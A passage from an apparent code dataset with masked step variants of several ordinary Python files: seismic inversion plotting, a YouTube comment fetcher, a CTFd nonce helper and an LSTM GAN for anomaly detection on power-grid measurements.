str(0.85-k/2/good_mods[0,].size)\n ax3.plot(good_mods[:,k],all_models[:,0],\n '-',linewidth=1,color=colstr)\nax3.invert_yaxis()\nax3.plot(mean_mod,all_models[:,0],'b-',linewidth = 2)\nax3.plot(mean_mod+std_mod, all_models[:,0],'c-',linewidth = 1)\nax3.plot(mean_mod-std_mod, all_models[:,0],'c-',linewidth = 1)\nax3.plot(actual_model,all_models[:,0],'r--',linewidth=1)\nax3.set_xlim((1.5,5))\nax3.set_xlabel('Shear Velocity (km/s)')\nax3.set_ylabel('Depth (km)')\n\nax3.set_title('Most recent {}'.format(good_mods.shape[1]))\n\n\nallvels = np.arange(all_lims.vs[0],all_lims.vs[1],0.01)\nevendeps = np.arange(0,all_models[-1,0],0.1)\ni_ed = np.zeros(evendeps.shape, dtype = int)\nfor k in range(all_models[:,0].size-1,0,-1):\n i_ed[all_models[k,0]>=evendeps] = k\n \nmod_space = np.zeros((evendeps.size,allvels.size))\nfor k in range(1,good_mods.shape[1]):\n even_vels = good_mods[i_ed,-k]\n inds = np.round(even_vels-all_lims.vs[0],2)/0.01\n inds = inds.astype(int)\n mod_space[range(mod_space.shape[0]),inds] += 1 \n\nplt.tight_layout()\n\nfig2 = plt.figure()\nax2 = plt.subplot(121)\nax2.imshow(np.log10(mod_space[-1::-1]+1e-1), cmap = 'viridis', aspect = allvels[-1]/evendeps[-1],\n extent = [allvels[0], allvels[-1], evendeps[0], evendeps[-1]])\nax2.invert_yaxis()\nax2.set_xlabel('Shear Velocity (km/s)')\nax2.set_ylabel('Depth (km)')\nax2.xaxis.set_label_position('top')\nax2.xaxis.tick_top()\nax2.set_xlim((1.5,5))\n\nplt.figure(); plt.title('Receiver Function - real: red; synth: grey')\nrft = np.arange(0,rf_obs.dt*rf_obs.amp.size,rf_obs.dt)\nplt.plot(rft, rf_obs.amp, 'r-', linewidth=2)\nsynth_rf = pipeline.SynthesiseRF(fullmodel)\nplt.plot(rft,synth_rf.amp, '-',color = '0.25', linewidth=1)\n\nsynth_swd = pipeline.SynthesiseSWD(fullmodel, swd_obs.period, 1e6)\nplt.figure(); plt.title('Surface Wave Dispersion - real: red; synth: grey')\nplt.plot(swd_obs.period, swd_obs.c, 'r-', linewidth=2)\nplt.plot(synth_swd.period, synth_swd.c, '-',color = '0.25', linewidth=1)\n\n\nplt.figure(); plt.title(\"Mahalanobis distance (least squares misfit - phi)\")\nplt.plot(np.log10(out[2]))\n\nplt.figure(); plt.title(\"Likelihood of accepting new model - alpha(m|m0)\")\nplt.plot(np.log10(out[3]))\n\nprint(np.mean(out[4]))\n#%%\npr.disable()\ns=open('thingy4.txt','w')\nsortby = 'cumulative'\nps = pstats.Stats(pr, stream=s).sort_stats(sortby)\nps.print_stats()\ns.close()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import json
import requests
from pyyoutube import Api
def get_data(YOUTUBE_API_KEY, videoId, maxResults, nextPageToken):
"""
Получение информации со страницы с видео по video id
"""
YOUTUBE_URI = 'https://www.googleapis.com/youtube/v3/commentThreads?key={KEY}&textFormat=plainText&' + \
'part=snippet&videoId={videoId}&maxResults={maxResults}&pageToken={nextPageToken}'
format_youtube_uri = YOUTUBE_URI.format(KEY=YOUTUBE_API_KEY,
videoId=videoId,
maxResults=maxResults,
nextPageToken=nextPageToken)
content = requests.get(format_youtube_uri).text
data = json.loads(content)
return data
def get_text_of_comment(data):
"""
Получение комментариев из полученных данных под одним видео
"""
comms = set()
for item in data['items']:
comm = item['snippet']['topLevelComment']['snippet']['textDisplay']
comms.add(comm)
return comms
def get_all_comments(YOUTUBE_API_KEY, query, count_video=10, limit=30, maxResults=10, nextPageToken=''):
"""
Выгрузка maxResults комментариев
"""
api = Api(api_key=YOUTUBE_API_KEY)
video_by_keywords = api.search_by_keywords(q=query,
search_type=["video"],
count=count_video,
limit=limit)
videoId = [x.id.videoId for x in video_by_keywords.items]
comments_all = []
for id_video in videoId:
try:
data = get_data(YOUTUBE_API_KEY,
id_video,
maxResults=maxResults,
nextPageToken=nextPageToken)
comment = list(get_text_of_comment(data))
comments_all.append(comment)
except:
continue
comments = sum(comments_all, [])
return comments
|
normal
|
{
"blob_id": "4ed5ceb784fb1e3046ab9f10c4b556f2e94274db",
"index": 7054,
"step-1": "<mask token>\n\n\ndef get_data(YOUTUBE_API_KEY, videoId, maxResults, nextPageToken):\n \"\"\"\n Получение информации со страницы с видео по video id\n \"\"\"\n YOUTUBE_URI = (\n 'https://www.googleapis.com/youtube/v3/commentThreads?key={KEY}&textFormat=plainText&'\n +\n 'part=snippet&videoId={videoId}&maxResults={maxResults}&pageToken={nextPageToken}'\n )\n format_youtube_uri = YOUTUBE_URI.format(KEY=YOUTUBE_API_KEY, videoId=\n videoId, maxResults=maxResults, nextPageToken=nextPageToken)\n content = requests.get(format_youtube_uri).text\n data = json.loads(content)\n return data\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_data(YOUTUBE_API_KEY, videoId, maxResults, nextPageToken):\n \"\"\"\n Получение информации со страницы с видео по video id\n \"\"\"\n YOUTUBE_URI = (\n 'https://www.googleapis.com/youtube/v3/commentThreads?key={KEY}&textFormat=plainText&'\n +\n 'part=snippet&videoId={videoId}&maxResults={maxResults}&pageToken={nextPageToken}'\n )\n format_youtube_uri = YOUTUBE_URI.format(KEY=YOUTUBE_API_KEY, videoId=\n videoId, maxResults=maxResults, nextPageToken=nextPageToken)\n content = requests.get(format_youtube_uri).text\n data = json.loads(content)\n return data\n\n\n<mask token>\n\n\ndef get_all_comments(YOUTUBE_API_KEY, query, count_video=10, limit=30,\n maxResults=10, nextPageToken=''):\n \"\"\"\n Выгрузка maxResults комментариев\n \"\"\"\n api = Api(api_key=YOUTUBE_API_KEY)\n video_by_keywords = api.search_by_keywords(q=query, search_type=[\n 'video'], count=count_video, limit=limit)\n videoId = [x.id.videoId for x in video_by_keywords.items]\n comments_all = []\n for id_video in videoId:\n try:\n data = get_data(YOUTUBE_API_KEY, id_video, maxResults=\n maxResults, nextPageToken=nextPageToken)\n comment = list(get_text_of_comment(data))\n comments_all.append(comment)\n except:\n continue\n comments = sum(comments_all, [])\n return comments\n",
"step-3": "<mask token>\n\n\ndef get_data(YOUTUBE_API_KEY, videoId, maxResults, nextPageToken):\n \"\"\"\n Получение информации со страницы с видео по video id\n \"\"\"\n YOUTUBE_URI = (\n 'https://www.googleapis.com/youtube/v3/commentThreads?key={KEY}&textFormat=plainText&'\n +\n 'part=snippet&videoId={videoId}&maxResults={maxResults}&pageToken={nextPageToken}'\n )\n format_youtube_uri = YOUTUBE_URI.format(KEY=YOUTUBE_API_KEY, videoId=\n videoId, maxResults=maxResults, nextPageToken=nextPageToken)\n content = requests.get(format_youtube_uri).text\n data = json.loads(content)\n return data\n\n\ndef get_text_of_comment(data):\n \"\"\"\n Получение комментариев из полученных данных под одним видео\n \"\"\"\n comms = set()\n for item in data['items']:\n comm = item['snippet']['topLevelComment']['snippet']['textDisplay']\n comms.add(comm)\n return comms\n\n\ndef get_all_comments(YOUTUBE_API_KEY, query, count_video=10, limit=30,\n maxResults=10, nextPageToken=''):\n \"\"\"\n Выгрузка maxResults комментариев\n \"\"\"\n api = Api(api_key=YOUTUBE_API_KEY)\n video_by_keywords = api.search_by_keywords(q=query, search_type=[\n 'video'], count=count_video, limit=limit)\n videoId = [x.id.videoId for x in video_by_keywords.items]\n comments_all = []\n for id_video in videoId:\n try:\n data = get_data(YOUTUBE_API_KEY, id_video, maxResults=\n maxResults, nextPageToken=nextPageToken)\n comment = list(get_text_of_comment(data))\n comments_all.append(comment)\n except:\n continue\n comments = sum(comments_all, [])\n return comments\n",
"step-4": "import json\nimport requests\nfrom pyyoutube import Api\n\n\ndef get_data(YOUTUBE_API_KEY, videoId, maxResults, nextPageToken):\n \"\"\"\n Получение информации со страницы с видео по video id\n \"\"\"\n YOUTUBE_URI = (\n 'https://www.googleapis.com/youtube/v3/commentThreads?key={KEY}&textFormat=plainText&'\n +\n 'part=snippet&videoId={videoId}&maxResults={maxResults}&pageToken={nextPageToken}'\n )\n format_youtube_uri = YOUTUBE_URI.format(KEY=YOUTUBE_API_KEY, videoId=\n videoId, maxResults=maxResults, nextPageToken=nextPageToken)\n content = requests.get(format_youtube_uri).text\n data = json.loads(content)\n return data\n\n\ndef get_text_of_comment(data):\n \"\"\"\n Получение комментариев из полученных данных под одним видео\n \"\"\"\n comms = set()\n for item in data['items']:\n comm = item['snippet']['topLevelComment']['snippet']['textDisplay']\n comms.add(comm)\n return comms\n\n\ndef get_all_comments(YOUTUBE_API_KEY, query, count_video=10, limit=30,\n maxResults=10, nextPageToken=''):\n \"\"\"\n Выгрузка maxResults комментариев\n \"\"\"\n api = Api(api_key=YOUTUBE_API_KEY)\n video_by_keywords = api.search_by_keywords(q=query, search_type=[\n 'video'], count=count_video, limit=limit)\n videoId = [x.id.videoId for x in video_by_keywords.items]\n comments_all = []\n for id_video in videoId:\n try:\n data = get_data(YOUTUBE_API_KEY, id_video, maxResults=\n maxResults, nextPageToken=nextPageToken)\n comment = list(get_text_of_comment(data))\n comments_all.append(comment)\n except:\n continue\n comments = sum(comments_all, [])\n return comments\n",
"step-5": "import json\n\nimport requests\nfrom pyyoutube import Api\n\n\ndef get_data(YOUTUBE_API_KEY, videoId, maxResults, nextPageToken):\n \"\"\"\n Получение информации со страницы с видео по video id\n \"\"\"\n YOUTUBE_URI = 'https://www.googleapis.com/youtube/v3/commentThreads?key={KEY}&textFormat=plainText&' + \\\n 'part=snippet&videoId={videoId}&maxResults={maxResults}&pageToken={nextPageToken}'\n format_youtube_uri = YOUTUBE_URI.format(KEY=YOUTUBE_API_KEY,\n videoId=videoId,\n maxResults=maxResults,\n nextPageToken=nextPageToken)\n content = requests.get(format_youtube_uri).text\n data = json.loads(content)\n return data\n\n\ndef get_text_of_comment(data):\n \"\"\"\n Получение комментариев из полученных данных под одним видео\n \"\"\"\n comms = set()\n for item in data['items']:\n comm = item['snippet']['topLevelComment']['snippet']['textDisplay']\n comms.add(comm)\n return comms\n\n\ndef get_all_comments(YOUTUBE_API_KEY, query, count_video=10, limit=30, maxResults=10, nextPageToken=''):\n \"\"\"\n Выгрузка maxResults комментариев\n \"\"\"\n api = Api(api_key=YOUTUBE_API_KEY)\n video_by_keywords = api.search_by_keywords(q=query,\n search_type=[\"video\"],\n count=count_video,\n limit=limit)\n videoId = [x.id.videoId for x in video_by_keywords.items]\n\n comments_all = []\n for id_video in videoId:\n try:\n data = get_data(YOUTUBE_API_KEY,\n id_video,\n maxResults=maxResults,\n nextPageToken=nextPageToken)\n comment = list(get_text_of_comment(data))\n comments_all.append(comment)\n except:\n continue\n comments = sum(comments_all, [])\n return comments\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from codecool_class import CodecoolClass
from mentor import Mentor
from student import Student
codecool_bp = CodecoolClass.create_local
|
normal
|
{
"blob_id": "7e985f55271c8b588abe54a07d20b89b2a29ff0d",
"index": 8380,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ncodecool_bp = CodecoolClass.create_local\n",
"step-3": "from codecool_class import CodecoolClass\nfrom mentor import Mentor\nfrom student import Student\ncodecool_bp = CodecoolClass.create_local\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import os
from CTFd.utils.encoding import hexencode
def generate_nonce():
return hexencode(os.urandom(32))
|
normal
|
{
"blob_id": "4f91c57ad42759654a87328d5c92de8da14ca5ea",
"index": 2966,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef generate_nonce():\n return hexencode(os.urandom(32))\n",
"step-3": "import os\nfrom CTFd.utils.encoding import hexencode\n\n\ndef generate_nonce():\n return hexencode(os.urandom(32))\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
# -*- coding: utf-8 -*-
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
%matplotlib inline
import os
#os.environ['CUDA_VISIBLE_DEVICES'] = '-1'
import keras
from keras.layers import Dense, Dropout, Input, Embedding, LSTM, Reshape, CuDNNLSTM
from keras.models import Model,Sequential
from keras.datasets import mnist
from tqdm import tqdm
from keras.layers.advanced_activations import LeakyReLU
from keras.activations import relu
from keras.optimizers import adam
import numpy as np
import tensorflow as tf
import random
import pickle as pkl
import operator
import math
from sklearn import preprocessing
from keras.models import load_model
import time
from scipy.stats import norm
from scipy.io import loadmat
from natsort import natsorted
from scipy import stats
from seaborn import heatmap
import loading_data
from loading_data import load_train_vitheta_data_1225,load_real_data, load_standardized_data,load_train_data,load_train_data_V,load_train_vitheta_data_V,load_data_with_features,load_standardized_data_with_features
#%%
#%%
# =============================================================================
# =============================================================================
# # save data with V I and theta for 1225
# =============================================================================
# =============================================================================
filename='Raw_data/1225/data'
#os.listdir(filename)
#
pkl_file = open(filename, 'rb')
selected_data = pkl.load(pkl_file)
pkl_file.close()
cosin={}
# Reacive={}
# keys={}
# pf={}
cosin['TA']=np.cos((selected_data['L1ANG']-selected_data['C1ANG'])*(np.pi/180))
cosin['TB']=np.cos((selected_data['L2ANG']-selected_data['C2ANG'])*(np.pi/180))
cosin['TC']=np.cos((selected_data['L3ANG']-selected_data['C3ANG'])*(np.pi/180))
# Reacive['A']=selected_data['L1Mag']*selected_data['C1Mag']*(np.sin((selected_data['L1Ang']-selected_data['C1Ang'])*(np.pi/180)))
# Reacive['B']=selected_data['L2Mag']*selected_data['C2Mag']*(np.sin((selected_data['L2Ang']-selected_data['C2Ang'])*(np.pi/180)))
# Reacive['C']=selected_data['L3Mag']*selected_data['C3Mag']*(np.sin((selected_data['L3Ang']-selected_data['C3Ang'])*(np.pi/180)))
#
#pf['A']=Active['A']/np.sqrt(np.square(Active['A'])+np.square(Reacive['A']))
#pf['B']=Active['B']/np.sqrt(np.square(Active['B'])+np.square(Reacive['B']))
#pf['C']=Active['C']/np.sqrt(np.square(Active['C'])+np.square(Reacive['C']))
selected_data['TA']=cosin['TA']
selected_data['TB']=cosin['TB']
selected_data['TC']=cosin['TC']
k=['L1MAG','L2MAG', 'L3MAG','C1MAG','C2MAG', 'C3MAG','TA', 'TB', 'TC']
day_data={}
for key in k:
day_data[key]=selected_data[key]
dir='Raw_data/1225/VIT.pkl'
output = open(dir, 'wb')
pkl.dump(day_data, output)
output.close()
#%%
# =============================================================================
# =============================================================================
# # train data prepreation
# =============================================================================
# =============================================================================
#start,SampleNum,N=(0,40,500000)
#filename='Raw_data/1225/VIT.pkl'
#k=['L1MAG','L2MAG', 'L3MAG','C1MAG','C2MAG', 'C3MAG','TA', 'TB', 'TC']
##%%
#dds=load_standardized_data_with_features(filename,k)
##%%
#dd=load_data_with_features(filename,k)
#%%
# =============================================================================
# =============================================================================
# # real data for 1225 VIT
# =============================================================================
# =============================================================================
filename='Raw_data/1225/VIT.pkl'
pkl_file = open(filename, 'rb')
selected_data_1225_normal = pkl.load(pkl_file)
pkl_file.close()
#%%
# =============================================================================
# =============================================================================
# # data without key
# =============================================================================
# =============================================================================
selected_data_1225=[]
for f in k:
selected_data_1225.append(selected_data_1225_normal[f])
#%%
start,SampleNum,N=(0,40,500000)
filename='Raw_data/1225/VIT.pkl'
k=['L1MAG','L2MAG', 'L3MAG','C1MAG','C2MAG', 'C3MAG','TA', 'TB', 'TC']
tt=load_train_vitheta_data_1225(start,SampleNum,N,filename,k)
#%%
X_train = tt
scores={}
probability_mean={}
anomalies={}
kkk=k[0:1]
for idx,key in enumerate(kkk):
print(key)
X_train_temp=X_train[:,idx]
#X_train.reshape(N,3*SampleNum)
X_train_temp=X_train_temp.reshape(N,SampleNum,1)
id=int(np.floor(idx/3))
mode=k[id*3]
# dis_name='dis_sep_onelearn_'+mode+'.h5'
# print(dis_name)
#
# discriminator=load_model(dis_name)
rate=1000
shift=N/rate
scores[key]=[]
for i in range(rate-1):
temp=discriminator.predict_on_batch(X_train_temp[int(i*shift):int((i+1)*shift)])
scores[key].append(temp)
# print(i)
scores[key]=np.array(scores[key])
scores[key]=scores[key].ravel()
probability_mean[key]=np.mean(scores[key])
data=scores[key]-probability_mean[key]
mu, std = norm.fit(data)
zp=3
high=mu+zp*std
low=mu-zp*std
anomalies[key]=np.union1d(np.where(data>=high)[0], np.where(data<=low)[0])
print(anomalies[key].shape)
#%%
# =============================================================================
# =============================================================================
# # plot 1225
# =============================================================================
# =============================================================================
def show_1225(events):
SampleNum=40
for anom in events:
anom=int(anom)
print(anom)
plt.subplot(221)
for i in [0,1,2]:
plt.plot(selected_data_1225[i][anom*int(SampleNum/2)-240:(anom*int(SampleNum/2)+240)])
plt.legend('A' 'B' 'C')
plt.title('V')
plt.subplot(222)
for i in [3,4,5]:
plt.plot(selected_data_1225[i][anom*int(SampleNum/2)-240:(anom*int(SampleNum/2)+240)])
plt.legend('A' 'B' 'C')
plt.title('I')
plt.subplot(223)
for i in [6,7,8]:
plt.plot(selected_data_1225[i][anom*int(SampleNum/2)-240:(anom*int(SampleNum/2)+240)])
plt.legend('A' 'B' 'C')
plt.title('T')
plt.show()
#%%
X_train = tt
#%%
def adam_optimizer():
return adam(lr=0.0002, beta_1=0.5)
#%%
def create_generator():
generator=Sequential()
generator.add(CuDNNLSTM(units=256,input_shape=(100,1),return_sequences=True))
generator.add(LeakyReLU(0.2))
generator.add(CuDNNLSTM(units=512))
generator.add(LeakyReLU(0.2))
generator.add(Dense(units=512))
generator.add(LeakyReLU(0.2))
#
# generator.add(LSTM(units=1024))
# generator.add(LeakyReLU(0.2))
generator.add(Dense(units=1*40))
generator.compile(loss='binary_crossentropy', optimizer=adam_optimizer())
return generator
g=create_generator()
g.summary()
#%%
def create_discriminator():
discriminator=Sequential()
discriminator.add(CuDNNLSTM(units=256,input_shape=(40,1),return_sequences=True))
discriminator.add(LeakyReLU(0.2))
# discriminator.add(Dropout(0.3))
discriminator.add(CuDNNLSTM(units=512))
discriminator.add(LeakyReLU(0.2))
#
discriminator.add(Dense(units=512))
discriminator.add(LeakyReLU(0.2))
# discriminator.add(Dropout(0.3))
#
# discriminator.add(LSTM(units=256))
# discriminator.add(LeakyReLU(0.2))
discriminator.add(Dense(units=1, activation='sigmoid'))
discriminator.compile(loss='binary_crossentropy', optimizer=adam_optimizer())
return discriminator
d =create_discriminator()
d.summary()
#%%
def create_gan(discriminator, generator):
discriminator.trainable=False
gan_input = Input(shape=(100,1))
x = generator(gan_input)
x = Reshape((40,1), input_shape=(1*40,1))(x)
gan_output= discriminator(x)
gan= Model(inputs=gan_input, outputs=gan_output)
gan.compile(loss='binary_crossentropy', optimizer='adam')
return gan
gan = create_gan(d,g)
gan.summary()
#%%
batch_size=5
epochnum=2
#%%
start,SampleNum,N=(0,40,500000)
#X_train = load_data(start,SampleNum,N)
#filename=
X_train = tt
batch_count = X_train.shape[0] / batch_size
##%%
#X_train=X_train.reshape(N,3*SampleNum)
#X_train=X_train.reshape(N,SampleNum,3)
#%%
rnd={}
for i in range(epochnum):
rnd[i]=np.random.randint(low=0,high=N,size=batch_size)
# show(rnd[i])
#%%
generator= create_generator()
discriminator= create_discriminator()
gan = create_gan(discriminator, generator)
#%%
all_scores=[]
def training(generator,discriminator,gan,epochs, batch_size,all_scores):
# all_scores=[]
scale=1
for e in range(1,epochs+1 ):
all_score_temp=[]
tik=time.clock()
print("Epoch %d" %e)
for _ in tqdm(range(batch_size)):
#generate random noise as an input to initialize the generator
noise= scale*np.random.normal(0,1, [batch_size, 100])
noise=noise.reshape(batch_size,100,1)
# Generate fake MNIST images from noised input
generated_images = generator.predict(noise)
generated_images = generated_images.reshape(batch_size,SampleNum,1)
# print(generated_images.shape)
# Get a random set of real images
# random.seed(0)
image_batch =X_train_temp[rnd[e-1]]
# print(image_batch.shape)
#Construct different batches of real and fake data
X= np.concatenate([image_batch, generated_images])
# Labels for generated and real data
y_dis=np.zeros(2*batch_size)
y_dis[:batch_size]=0.9
#Pre train discriminator on fake and real data before starting the gan.
discriminator.trainable=True
discriminator.train_on_batch(X, y_dis)
#Tricking the noised input of the Generator as real data
noise= scale*np.random.normal(0,1, [batch_size, 100])
noise=noise.reshape(batch_size,100,1)
y_gen = np.ones(batch_size)
# During the training of gan,
# the weights of discriminator should be fixed.
#We can enforce that by setting the trainable flag
discriminator.trainable=False
#training the GAN by alternating the training of the Discriminator
#and training the chained GAN model with Discriminator’s weights freezed.
gan.train_on_batch(noise, y_gen)
rate=1000
shift=N/rate
all_score_temp=[]
for i in range(rate-1):
temp=discriminator.predict_on_batch(X_train_temp[int(i*shift):int((i+1)*shift)])
all_score_temp.append(temp)
# print(i)
all_score_temp=np.array(all_score_temp)
all_score_temp=all_score_temp.ravel()
all_scores.append(all_score_temp)
toc = time.clock()
print(toc-tik)
#%%
kk=['L1MAG']
for idx,key in enumerate(kk):
X_train_temp=X_train[:,(idx)]
#X_train.reshape(N,3*SampleNum)
X_train_temp=X_train_temp.reshape(N,SampleNum,1)
tic = time.clock()
training(generator,discriminator,gan,epochnum,batch_size,all_scores)
toc = time.clock()
print(toc-tic)
#
# gan_name='gan_sep_onelearn_good_09_'+key+'.h5'
# gen_name='gen_sep_onelearn_good_09_'+key+'.h5'
# dis_name='dis_sep_onelearn_good_09_'+key+'.h5'
# print(dis_name)
# gan.save(gan_name)
# generator.save(gen_name)
# discriminator.save(dis_name)
|
normal
|
{
"blob_id": "bb335187dc61fae049ca4a9a55a93f856b3c7822",
"index": 2534,
"step-1": "# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n%matplotlib inline\nimport os\n#os.environ['CUDA_VISIBLE_DEVICES'] = '-1'\nimport keras\nfrom keras.layers import Dense, Dropout, Input, Embedding, LSTM, Reshape, CuDNNLSTM\nfrom keras.models import Model,Sequential\nfrom keras.datasets import mnist\nfrom tqdm import tqdm\nfrom keras.layers.advanced_activations import LeakyReLU\nfrom keras.activations import relu\nfrom keras.optimizers import adam\nimport numpy as np\nimport tensorflow as tf\nimport random\nimport pickle as pkl\nimport operator\nimport math\nfrom sklearn import preprocessing\nfrom keras.models import load_model\nimport time\nfrom scipy.stats import norm\nfrom scipy.io import loadmat\nfrom natsort import natsorted\nfrom scipy import stats\nfrom seaborn import heatmap\n\nimport loading_data\nfrom loading_data import load_train_vitheta_data_1225,load_real_data, load_standardized_data,load_train_data,load_train_data_V,load_train_vitheta_data_V,load_data_with_features,load_standardized_data_with_features\n\n\n#%%\n \n#%%\n# =============================================================================\n# =============================================================================\n# # save data with V I and theta for 1225\n# =============================================================================\n# =============================================================================\nfilename='Raw_data/1225/data'\n#os.listdir(filename)\n#\npkl_file = open(filename, 'rb')\nselected_data = pkl.load(pkl_file)\npkl_file.close()\ncosin={}\n# Reacive={}\n# keys={}\n# pf={}\n\n \ncosin['TA']=np.cos((selected_data['L1ANG']-selected_data['C1ANG'])*(np.pi/180))\ncosin['TB']=np.cos((selected_data['L2ANG']-selected_data['C2ANG'])*(np.pi/180))\ncosin['TC']=np.cos((selected_data['L3ANG']-selected_data['C3ANG'])*(np.pi/180))\n \n # Reacive['A']=selected_data['L1Mag']*selected_data['C1Mag']*(np.sin((selected_data['L1Ang']-selected_data['C1Ang'])*(np.pi/180)))\n # Reacive['B']=selected_data['L2Mag']*selected_data['C2Mag']*(np.sin((selected_data['L2Ang']-selected_data['C2Ang'])*(np.pi/180)))\n # Reacive['C']=selected_data['L3Mag']*selected_data['C3Mag']*(np.sin((selected_data['L3Ang']-selected_data['C3Ang'])*(np.pi/180)))\n # \n #pf['A']=Active['A']/np.sqrt(np.square(Active['A'])+np.square(Reacive['A']))\n #pf['B']=Active['B']/np.sqrt(np.square(Active['B'])+np.square(Reacive['B']))\n #pf['C']=Active['C']/np.sqrt(np.square(Active['C'])+np.square(Reacive['C']))\n \n \nselected_data['TA']=cosin['TA']\nselected_data['TB']=cosin['TB']\nselected_data['TC']=cosin['TC']\n \nk=['L1MAG','L2MAG', 'L3MAG','C1MAG','C2MAG', 'C3MAG','TA', 'TB', 'TC']\nday_data={}\nfor key in k:\n day_data[key]=selected_data[key]\n \n\ndir='Raw_data/1225/VIT.pkl'\noutput = open(dir, 'wb')\npkl.dump(day_data, output)\noutput.close()\n\n#%%\n\n\n# =============================================================================\n# =============================================================================\n# # train data prepreation\n# =============================================================================\n# =============================================================================\n#start,SampleNum,N=(0,40,500000)\n#filename='Raw_data/1225/VIT.pkl'\n#k=['L1MAG','L2MAG', 'L3MAG','C1MAG','C2MAG', 'C3MAG','TA', 'TB', 'TC']\n##%%\n#dds=load_standardized_data_with_features(filename,k)\n##%%\n#dd=load_data_with_features(filename,k)\n#%%\n# =============================================================================\n# =============================================================================\n# # real data for 1225 VIT\n# =============================================================================\n# =============================================================================\nfilename='Raw_data/1225/VIT.pkl'\npkl_file = open(filename, 'rb')\nselected_data_1225_normal = pkl.load(pkl_file)\npkl_file.close()\n#%%\n# =============================================================================\n# =============================================================================\n# # data without key\n# =============================================================================\n# =============================================================================\nselected_data_1225=[]\nfor f in k:\n selected_data_1225.append(selected_data_1225_normal[f])\n#%%\nstart,SampleNum,N=(0,40,500000)\nfilename='Raw_data/1225/VIT.pkl'\nk=['L1MAG','L2MAG', 'L3MAG','C1MAG','C2MAG', 'C3MAG','TA', 'TB', 'TC']\ntt=load_train_vitheta_data_1225(start,SampleNum,N,filename,k)\n#%%\nX_train = tt\nscores={}\nprobability_mean={}\nanomalies={}\nkkk=k[0:1]\nfor idx,key in enumerate(kkk):\n print(key)\n X_train_temp=X_train[:,idx]\n#X_train.reshape(N,3*SampleNum)\n X_train_temp=X_train_temp.reshape(N,SampleNum,1)\n\n id=int(np.floor(idx/3))\n mode=k[id*3]\n# dis_name='dis_sep_onelearn_'+mode+'.h5'\n# print(dis_name)\n# \n# discriminator=load_model(dis_name)\n \n \n rate=1000\n shift=N/rate\n scores[key]=[]\n for i in range(rate-1):\n temp=discriminator.predict_on_batch(X_train_temp[int(i*shift):int((i+1)*shift)])\n scores[key].append(temp)\n# print(i)\n \n scores[key]=np.array(scores[key])\n scores[key]=scores[key].ravel()\n \n probability_mean[key]=np.mean(scores[key])\n data=scores[key]-probability_mean[key]\n \n mu, std = norm.fit(data)\n \n zp=3\n \n high=mu+zp*std\n low=mu-zp*std\n \n anomalies[key]=np.union1d(np.where(data>=high)[0], np.where(data<=low)[0])\n print(anomalies[key].shape)\n \n#%%\n# =============================================================================\n# =============================================================================\n# # plot 1225\n# =============================================================================\n# =============================================================================\n\ndef show_1225(events):\n SampleNum=40\n for anom in events:\n anom=int(anom)\n print(anom)\n \n plt.subplot(221)\n for i in [0,1,2]:\n plt.plot(selected_data_1225[i][anom*int(SampleNum/2)-240:(anom*int(SampleNum/2)+240)])\n plt.legend('A' 'B' 'C')\n plt.title('V')\n \n plt.subplot(222)\n for i in [3,4,5]:\n plt.plot(selected_data_1225[i][anom*int(SampleNum/2)-240:(anom*int(SampleNum/2)+240)])\n plt.legend('A' 'B' 'C')\n plt.title('I') \n \n plt.subplot(223)\n for i in [6,7,8]:\n plt.plot(selected_data_1225[i][anom*int(SampleNum/2)-240:(anom*int(SampleNum/2)+240)])\n plt.legend('A' 'B' 'C') \n plt.title('T') \n plt.show() \n#%%\nX_train = tt\n #%%\ndef adam_optimizer():\n return adam(lr=0.0002, beta_1=0.5)\n#%%\ndef create_generator():\n generator=Sequential()\n generator.add(CuDNNLSTM(units=256,input_shape=(100,1),return_sequences=True))\n generator.add(LeakyReLU(0.2))\n \n generator.add(CuDNNLSTM(units=512))\n generator.add(LeakyReLU(0.2))\n \n generator.add(Dense(units=512))\n generator.add(LeakyReLU(0.2))\n# \n# generator.add(LSTM(units=1024))\n# generator.add(LeakyReLU(0.2))\n \n generator.add(Dense(units=1*40))\n \n generator.compile(loss='binary_crossentropy', optimizer=adam_optimizer())\n return generator\ng=create_generator()\ng.summary()\n\n#%%\ndef create_discriminator():\n discriminator=Sequential()\n discriminator.add(CuDNNLSTM(units=256,input_shape=(40,1),return_sequences=True))\n discriminator.add(LeakyReLU(0.2))\n# discriminator.add(Dropout(0.3))\n discriminator.add(CuDNNLSTM(units=512))\n discriminator.add(LeakyReLU(0.2))\n# \n discriminator.add(Dense(units=512))\n discriminator.add(LeakyReLU(0.2))\n# discriminator.add(Dropout(0.3))\n# \n# discriminator.add(LSTM(units=256))\n# discriminator.add(LeakyReLU(0.2))\n \n discriminator.add(Dense(units=1, activation='sigmoid'))\n \n discriminator.compile(loss='binary_crossentropy', optimizer=adam_optimizer())\n return discriminator\nd =create_discriminator()\nd.summary()\n#%%\ndef create_gan(discriminator, generator):\n discriminator.trainable=False\n gan_input = Input(shape=(100,1))\n x = generator(gan_input)\n x = Reshape((40,1), input_shape=(1*40,1))(x)\n gan_output= discriminator(x)\n gan= Model(inputs=gan_input, outputs=gan_output)\n gan.compile(loss='binary_crossentropy', optimizer='adam')\n return gan\ngan = create_gan(d,g)\ngan.summary()\n\n#%%\nbatch_size=5\nepochnum=2\n\n\n#%%\n\nstart,SampleNum,N=(0,40,500000)\n#X_train = load_data(start,SampleNum,N)\n#filename=\nX_train = tt\nbatch_count = X_train.shape[0] / batch_size\n##%%\n#X_train=X_train.reshape(N,3*SampleNum)\n#X_train=X_train.reshape(N,SampleNum,3)\n#%%\nrnd={}\nfor i in range(epochnum):\n rnd[i]=np.random.randint(low=0,high=N,size=batch_size)\n# show(rnd[i])\n \n\n#%%\ngenerator= create_generator()\ndiscriminator= create_discriminator()\ngan = create_gan(discriminator, generator)\n\n#%%\nall_scores=[]\ndef training(generator,discriminator,gan,epochs, batch_size,all_scores):\n# all_scores=[]\n scale=1\n for e in range(1,epochs+1 ):\n 